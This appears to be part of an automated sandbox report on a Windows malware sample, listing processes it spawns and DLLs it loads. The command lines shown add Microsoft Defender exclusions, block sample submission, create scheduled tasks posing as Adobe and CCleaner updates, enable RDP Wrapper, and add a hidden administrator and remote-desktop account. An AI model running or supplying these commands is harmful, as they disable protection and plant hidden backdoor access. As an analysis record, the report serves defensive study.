              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\makecab.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: mpr.dllJump to behavior
